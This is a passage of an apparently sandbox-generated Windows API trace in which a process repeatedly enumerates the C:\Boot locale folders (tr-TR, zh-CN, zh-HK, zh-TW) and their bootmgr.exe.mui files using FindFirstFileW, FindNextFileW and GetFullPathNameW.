cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.442] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0039.442] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.442] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0039.442] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0039.442] GetFullPathNameW (in: lpFileName="C:\\Boot\\tr-TR\\.", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\tr-TR", lpFilePart=0x0) returned 0xd [0039.442] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0039.442] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0039.442] CoTaskMemFree (pv=0x4fe370) [0039.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0039.443] GetFullPathNameW (in: lpFileName="C:\\Boot\\tr-TR", nBufferLength=0x105, lpBuffer=0x2aedb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\tr-TR", lpFilePart=0x0) returned 0xd [0039.443] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0039.443] GetFullPathNameW (in: lpFileName="C:\\Boot\\tr-TR", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\tr-TR", lpFilePart=0x0) returned 0xd [0039.443] GetFullPathNameW (in: lpFileName="C:\\Boot\\tr-TR\\", nBufferLength=0x105, lpBuffer=0x2aed58, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\tr-TR\\", lpFilePart=0x0) returned 0xe [0039.443] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.474] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.474] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.474] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0039.474] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.474] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0039.474] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0039.474] GetFullPathNameW (in: lpFileName="C:\\Boot\\tr-TR\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\tr-TR\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0039.474] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0039.474] GetFullPathNameW (in: lpFileName="C:\\Boot\\tr-TR", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\tr-TR", lpFilePart=0x0) returned 0xd [0039.474] GetFullPathNameW (in: lpFileName="C:\\Boot\\tr-TR\\", nBufferLength=0x105, lpBuffer=0x2aed58, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\tr-TR\\", lpFilePart=0x0) returned 0xe [0039.474] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.474] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.474] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.474] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0039.475] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.475] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0039.475] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0039.475] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-CN\\.", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-CN", lpFilePart=0x0) returned 0xd [0039.475] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0039.475] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0039.475] CoTaskMemFree (pv=0x4fe370) [0039.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0039.475] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-CN", nBufferLength=0x105, lpBuffer=0x2aedb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-CN", lpFilePart=0x0) returned 0xd [0039.475] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0039.475] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-CN", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-CN", lpFilePart=0x0) returned 0xd [0039.475] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-CN\\", nBufferLength=0x105, lpBuffer=0x2aed58, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-CN\\", lpFilePart=0x0) returned 0xe [0039.475] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.475] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.476] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.476] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0039.476] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.476] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0039.476] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0039.476] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-CN\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-CN\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0039.476] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0039.476] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-CN", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-CN", lpFilePart=0x0) returned 0xd [0039.476] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-CN\\", nBufferLength=0x105, lpBuffer=0x2aed58, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-CN\\", lpFilePart=0x0) returned 0xe [0039.476] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.476] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.476] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.476] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0039.476] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.476] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0039.476] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0039.476] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-HK\\.", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-HK", lpFilePart=0x0) returned 0xd [0039.477] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0039.477] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0039.477] CoTaskMemFree (pv=0x4fe370) [0039.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0039.477] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-HK", nBufferLength=0x105, lpBuffer=0x2aedb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-HK", lpFilePart=0x0) returned 0xd [0039.477] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0039.477] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-HK", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-HK", lpFilePart=0x0) returned 0xd [0039.477] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-HK\\", nBufferLength=0x105, lpBuffer=0x2aed58, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-HK\\", lpFilePart=0x0) returned 0xe [0039.477] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.483] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.483] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.483] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0039.483] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.483] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0039.483] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0039.483] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-HK\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-HK\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0039.483] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0039.483] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-HK", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-HK", lpFilePart=0x0) returned 0xd [0039.483] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-HK\\", nBufferLength=0x105, lpBuffer=0x2aed58, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-HK\\", lpFilePart=0x0) returned 0xe [0039.483] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.483] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.484] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.484] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0039.484] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.484] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0039.484] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0039.484] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-TW\\.", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-TW", lpFilePart=0x0) returned 0xd [0039.484] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0039.484] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0039.484] CoTaskMemFree (pv=0x4fe370) [0039.484] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0039.484] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-TW", nBufferLength=0x105, lpBuffer=0x2aedb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-TW", lpFilePart=0x0) returned 0xd [0039.484] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0039.484] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-TW", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-TW", lpFilePart=0x0) returned 0xd [0039.484] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-TW\\", nBufferLength=0x105, lpBuffer=0x2aed58, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-TW\\", lpFilePart=0x0) returned 0xe [0039.484] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.485] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.485] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.485] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0039.485] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.485] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0039.485] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0039.485] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-TW\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-TW\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0039.485] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) 